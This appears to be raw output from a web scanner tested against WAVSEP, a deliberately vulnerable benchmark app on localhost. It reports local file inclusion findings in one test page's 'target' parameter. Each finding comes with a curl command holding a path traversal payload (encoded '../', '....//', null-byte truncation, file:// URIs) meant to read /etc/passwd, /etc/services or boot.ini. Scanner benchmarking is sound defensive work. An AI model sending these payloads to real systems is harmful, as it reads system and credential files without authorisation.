curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"

